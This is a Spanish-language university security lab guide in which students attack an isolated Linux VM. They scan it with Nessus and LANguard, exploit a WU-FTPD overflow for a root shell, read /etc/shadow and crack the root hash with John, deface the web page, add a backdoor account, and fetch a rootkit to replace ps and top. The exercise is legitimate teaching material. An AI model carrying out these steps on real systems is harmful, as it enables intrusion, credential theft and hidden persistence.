SEGURIDAD INFORMÁTICA I Laboratorio Nº 3
“Identifica Fallas de Seguridad en SoftwareATAQUES”
Tecsup
“ATAQUES”
OBJETIVOS
Auditoria de la red. Ingreso a vulnerabilidades de la Red.
EQUIPOS
3 Computadoras.
IMPORTANTE Para identificar su trabajo configure la variable HOSTNAME de las virtuales con su apellido_nombre (en ese formato)
PROCEDIMIENTO VULNERANDO A SERVIDORES LINUX Escenario de pruebas:
PARTE 1 Activaremos las máquinas virtuales VL (Maquina víctima de Linux) y IN03 (Maquina Intruso basado en CENTOS).
MAQUINA VIRTUAL PREPARADA VL 1. (VL) Se ha preparado una Máquina Virtual Linux SERVER: Descomprima “Linux VL.rar” Active la máquina virtual. La máquina virtual está configurada con los siguientes datos: IP: 192.168.90.113 Verificar que los servicios FTP y WEB estén activados. 2. (VL) Al activar la máquina virtual ingresar: Login: root Password: tecsup Nota: El modo grafico no está instalado. No siendo necesario.
SERVICIOS 3. (VL) Configurando una página WEB: # echo “Hola Mundo Linux”
>
/home/httpd/html/index.html
4. (I2) Comprobando:
Nota:
o o
Crear la máquina virtual con BacKtrack bt2final.iso La máquina virtual debe estar configurada con los siguientes datos:
-1-
Tecsup
IP: 192.168.90.111
Cierre el navegador y vuelva abrirlo. La página WEB: http://192.168.90.113 Acceso a FTP: ftp://192.168.90.113
PARTE 2 Visualizando (NESSUS)
los
puertos
(GFI
LANGUARD)
y
las
vulnerabilidades
PUERTOS 5. (I2) Ejecutando GFI Backtrack > Vulnerability Identification > Securityscanner > GFILANGUARD 2.0 Target:
192.168.90.113
¿Qué versión de Sistema Operativo es? _____
Visualicé los puertos: Clic “ Open Ports” ¿Aparece el puerto (21) del FTP? ___
VULNERABILIDADES
6. (I1) Revisaremos las vulnerabilidades de VL : Nota: Descomprimir el archivo Windows Xp I1.rar Verificar IP: 192.168.90.110 • •
En la ventana de nessus
Este programa se encuentra en E: /soft.
Menu “ Session ” > New Session Name :
vl
Lengüeta “ Target ”
Host name:
192.168.90.113
Ubicarse en VL
Execute
Execute
Nota: Espere hasta que termine todo el TEST. Visualicé la columna “all tests” deberá llegar 100%
Al terminar: Clic > PC 192.168.90.113 Ubique las fallas críticas en los puertos abiertos (21/tcp) y (80/tcp) Muestre el grado de severidad de estas fallas
-2-
Tecsup
¿En qué consiste estas vulnerabilidades? y ¿Cuál es su solución para cada una de ellas? Explique. Cierre la ventana.
Apague las Máquinas Virtuales (I1, I2)
7. Explique la metodología utilizada por los hackers para vulnerar servidores Linux.
PARTE 3 Explotando vulnerabilidad WU-FTPD del Servidor Linux. Para esta acción usaremos un CENTOS, que se ha colocado los software a usar en el directorio /soft
MAQUINA VIRTUAL PREPARADA I3 8. (I3) Se ha preparado una Máquina Virtual Centos SERVER: Descomprima “Linux I3.rar” Active la máquina virtual. La máquina virtual está configurada con los siguientes datos: IP: 192.168.90.112
Al activar la máquina virtual: Si aparece nuevo dispositivo detectado, seleccionar: Login: root Password: tecsup
ATAQUE POR DESBORDAMIENTO (INTRUSO) 9. (I3) Instalando la herramienta de ataque: Abra un Terminal # cd /soft # tar zxvf ftp.tgz # cd ftp 10. (I3) Realizando el ataque: # ./awu
192.168.90.113
Nota: Visualizara que al realizar el exploit (desbordamiento) aparecerá el siguiente mensaje:
uid=o(root) gid=0(root) eigd=50(ftp) groups=50(ftp) Linux rh61.empresa.com.pe
-3-
Tecsup
ACCIONES 11. (I3) A continuación deberá de imaginarse que está en una consola remota del Servidor Victima. No visualizara ningún prompt. Pero detrás es como si lo estuviera. Entonces ahora ejecutaremos comandos y comprobaremos que si hemos ingresado a la víctima:
Visualizando información de usuarios y passwords: cat /etc/passwd cat /etc/shadow
De la información mostrada del archivo “/etc/shadow”, obtenga la información del password encriptado del “root” y anótelo (Respete mayúsculas y minúsculas). root:_____________________________________:
Cambiando la página WEB: echo “Ya estoy aqui Linux…soy APELLIDO-NOMBRE” > /home/httpd/html/index.html
Agregando cuentas:
OBJETIVO:
En la ventana donde hemos ingresado a la víctima, crearemos una cuenta. De esta forma no alteraremos la información de la cuenta “ root”. Luego para comprobar que hemos vulnerado la seguridad de acceso nos conectaremos remotamente (TELNET) a la IP de la víctima con la cuenta creada:
usuario apellido
password apellido
Tipo usuario
/usr/sbin/useradd apellido /usr/bin/passwd apellido apellido apellido Nota:
Cuando se solicita password, deberá de confirmar nuevamente el password. Debera al final aparecer el mensaje:
“Changing Password for user apellido”
Para salir del programa ataque aplique: +
VISUALIZANDO PÁGINA CAMBIADA 12. (I3) Visualice el cambio de la página WEB: http://192.168.90.113
AVERIGUANDO EL PASSWORD 13. (I3) Descubriendo password: Ubíquese en el directorio del crack: # cd /soft/john-1.7.0.2/run Genere un archivo pass.txt “ ”: # vi pass.txt root:[Colocar el password encriptado]
Ejemplo: root:45ef21343434AD
Ejecute el programa john: # ./john pass.txt ¿Encontró el password? ¿Cuál es?
-4-
Tecsup
Muestre su pantalla de descubrimiento del password del root.
¿Qué tipo de encriptación utiliza “jhon”? Explique. Nota: Para volver a ejecutar el comando john, deberá borrar un archivo “ john.pot ”
ACCESO A LA VICTIMA 14. (I3) Prueba de acceso: Apertura una nueva consola. Realice una conexión TELNET a la IP de la VICTIMA: # telnet 192.168.90.113 Login: apellido Password: apellido $ su – root Password: tecsup #
Una vez adentro puede pasearse por todo el sistema de la Victima. Aplique el siguiente comando de reiniciar: # init 6
PARTE 4 Ahora el intruso tratar de infectar las herramientas de administración que permite monitorear la actividad del S.O.
HERRAMIENTAS DE ADMINISTRACION 15. (I3) Comprobando el funcionamiento de las herramientas: Realice una conexión TELNET a la IP de la VICTIMA: # telnet 192.168.90.113 Login: apellido Password: apellido $ su – root Password: tecsup #
Ejecute las siguientes herramientas “ps” y “top” (visualice el cuadro siguiente) en la ventana de Telnet que se ha conectado a la victima. Compruebe su función: Herramienta # ps –A # top
Función Mostrará los procesos de corrido Mostrará en online los movimientos.
Nota: Para salir del “top” presionar la tecla
Mantenga esta ventana de Telnet con la víctima.
INFECCION 16. (I3) Alojando infección mrk.tgz “ ” en el FTP:
Apertura
otra ventana de consola.
-5-
Tecsup
# cd /soft # cp mrk.tgz /var/ftp # service vsftpd restart 17. (I3) Desde la ventana TELNET que está conectada a la VICTIMA, realice la transferencia: # cd /tmp # ftp 192.168.90.112 Autentifíquese con la cuenta “ anonymous” y password > get mrk.tgz > quit
18. (I3) Desde la ventana TELNET que esta conectada a la VICTIMA, reemplacé los archivos de sistema por archivos infectados: # # # #
tar zxvf mrk.tgz cd microbu cp ps /bin/ cp top /usr/bin/
A la pregunta de (s/n) indicar :
y Y ” , la opción “ s” no funciona.
INFECCION
Use “
19. (VL) Comprobando la infección Que resultado obtiene ahora al ejecutarse (ver cuadro) los comandos reemplazados: Herramienta # ps –A # top
Función No funciona Al ejecutarlo no muestra información.
Nota: Observara que los comandos no muestran la información
Conclusiones y Recomendaciones
-6-
Tecsup
TECSUP
-7-
Tecsup
Criterios de evaluación Redes y Comunicaciones de Datos Rúbrica f. Resultado
Los estudiantes identifican, analizan y resuelven problemas de tecnología.
f.1. Analiza problemas e identifica fallas, utilizando procedimientos y herramientas apropiadas a sistemas de hardware y software.
Criterio de desempeño Curso
Seguridad Informática I
Actividad
Periodo
Identifica Fallas de Seguridad en Software (Ataques)
Nombre del Alumno Adolfo Cáceres Luque
Docente
Criterios a Evaluar
Fecha
Semestre
V
Semana
3
Sección
Excelente
Bueno
Requiere Mejora
No Aceptable
Identificación de la metodología usada por los hacker para vulnerar servidores linux
5
4
3
2-0
Descubrimiento de los puertos abiertos con el fin de scanear vulnerabilidades de los servicios.
5
4
3
2-0
Uso de métodos para reemplazar archivos del sistema por infectados.
5
4
3
1-0
Uso de herramientas para identificar las vulnerabilidades de los servicios encontrados en los servidores
5
4
3
0
20-17
16-13
12-6
5-0
Total
2013-II
Puntaje Logrado
Acciones a cumplir
Impuntualidad
No envía laboratorios anteriores en la fecha acordada
Otras penalidades
-
Puntaje Final
Comentario al alumno o alumnos
Excelente Bueno Requiere mejora No Aceptable
Descripción Demuestra un completo entendimiento del problema o realiza la actividad cumpliendo todos los requerimientos especificados. Demuestra un considerable entendimiento del problema o realiza la actividad cumpliendo con la mayoría de los requerimientos especificados. Demuestra un bajo entendimiento del problema o realiza la actividad cumpliendo con pocos de los requerimientos especificados. No demuestra entendimiento del problema o de la actividad.
-8-